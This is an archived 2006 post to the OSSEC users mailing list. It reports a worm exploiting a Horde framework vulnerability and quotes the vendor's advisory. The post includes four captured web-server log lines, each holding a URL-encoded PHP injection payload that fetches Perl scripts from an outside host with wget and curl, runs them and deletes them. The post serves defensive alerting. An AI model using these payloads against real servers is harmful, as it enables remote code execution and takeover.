[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[ossec-list] Horde worm in the wild.

To: "OSSEC Users List" <ossec-list@xxxxxxxxx>
Subject: [ossec-list] Horde worm in the wild.
From: "Daniel Cid" <daniel.cid@xxxxxxxxx>
Date: Tue, 20 Jun 2006 22:36:27 -0300

Is anyone noticing a new horde worm out there? It is related to the
following vulnerability (http://www.horde.org):

"
March 28th, 2006. The Horde Team has released a critical security fix
for the Horde Application Framework versions 3.0 and above. Version
2.x and earlier releases are not affected. The fixed Horde versions
3.0.10 and 3.1.1 are available. We strongly encourage every user to
update to the new versions immediately.

There are exploits in the wild for this vulnerability. They can only
exploit the user the webserver runs as, but are still serious. Please
upgrade now.
"

I'm getting alerts from ossec for the following logs (yes, my horde is
updated :)).
Is anyone seeing that?


217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"

204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41"

204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41"

69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41"


Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net

--~--~---------~--~----~------------~-------~--~----~
-~----------~----~----~----~------~----~------~--~---

Follow-Ups:
- [ossec-list] Re: Horde worm in the wild.
  - From: ahmet ozturk

Prev by Date: [ossec-list] Re: OSSEC and sshd(pam_unix)
Next by Date: [ossec-list] Re: White-list for a network
Previous by thread: [ossec-list] Re: OSSEC and sshd(pam_unix)
Next by thread: [ossec-list] Re: Horde worm in the wild.
Index(es):
- Date
- Thread

OSSEC home | Main Index | Thread Index

OSSEC project: www.ossec.net.
Mailling list information: http://www.ossec.net/en/mailing_lists.html.